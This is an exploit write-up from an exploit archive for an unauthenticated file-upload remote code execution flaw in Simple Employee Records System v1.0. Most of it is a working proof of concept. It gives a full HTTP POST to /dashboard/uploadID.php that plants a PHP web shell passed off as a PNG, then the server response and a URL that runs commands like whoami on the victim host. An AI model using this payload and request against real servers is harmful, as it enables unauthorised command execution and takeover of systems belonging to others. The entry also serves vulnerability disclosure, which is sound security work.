Share
## https://sploitus.com/exploit?id=PACKETSTORM:161559
# Exploit Title: Simple Employee Records System - File Upload RCE   
(Unauthenticated)  
# Date: 2021-02-25  
# Exploit Author: sml@lacashita.com  
# Vendor Homepage:   
https://www.sourcecodester.com/php/11393/employee-records-system.html  
# Software Link:   
https://www.sourcecodester.com/sites/default/files/download/oretnom23/employee_records_system.zip  
# Version: v1.0  
# Tested on: Ubuntu 20.04.2  
  
http://IP/dashboard/uploadID.php can be used to upload .php files to   
'/uploads/employees_ids/' without authentication.  
  
POC  
---  
  
1) Make the following Request changing the "Host:" to your Victim IP.  
  
POST /dashboard/uploadID.php HTTP/1.1  
Host: 192.168.1.117  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101   
Firefox/78.0  
Accept: application/json, text/javascript, */*; q=0.01  
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
X-Requested-With: XMLHttpRequest  
Content-Type: multipart/form-data;   
boundary=---------------------------5825462663702204104870787337  
Content-Length: 267  
DNT: 1  
Connection: close  
  
-----------------------------5825462663702204104870787337  
Content-Disposition: form-data; name="employee_ID"; filename="cmd2.php"  
Content-Type: image/png  
<?php  
$cmd=$_GET['cmd'];  
system($cmd);  
?>  
-----------------------------5825462663702204104870787337--  
  
  
2) You will get the response with the randomized name of the uploaded   
file (upload_filename).  
  
HTTP/1.1 200 OK  
Server: nginx/1.18.0 (Ubuntu)  
Date: Thu, 25 Feb 2021 19:17:55 GMT  
Content-Type: text/html; charset=UTF-8  
Connection: close  
Content-Length: 77  
{"upload_filename":"Ag1rzKFWTlnCZhL_cmd2.php","selected_filename":"cmd2.php"}  
  
3) Your file will be located in:   
http://VICTIM_IP/uploads/employees_ids/Ag1rzKFWTlnCZhL_cmd2.php  
  
4) In this example, to run commands:  
http://192.168.1.117/uploads/employees_ids/Ag1rzKFWTlnCZhL_cmd2.php?cmd=whoami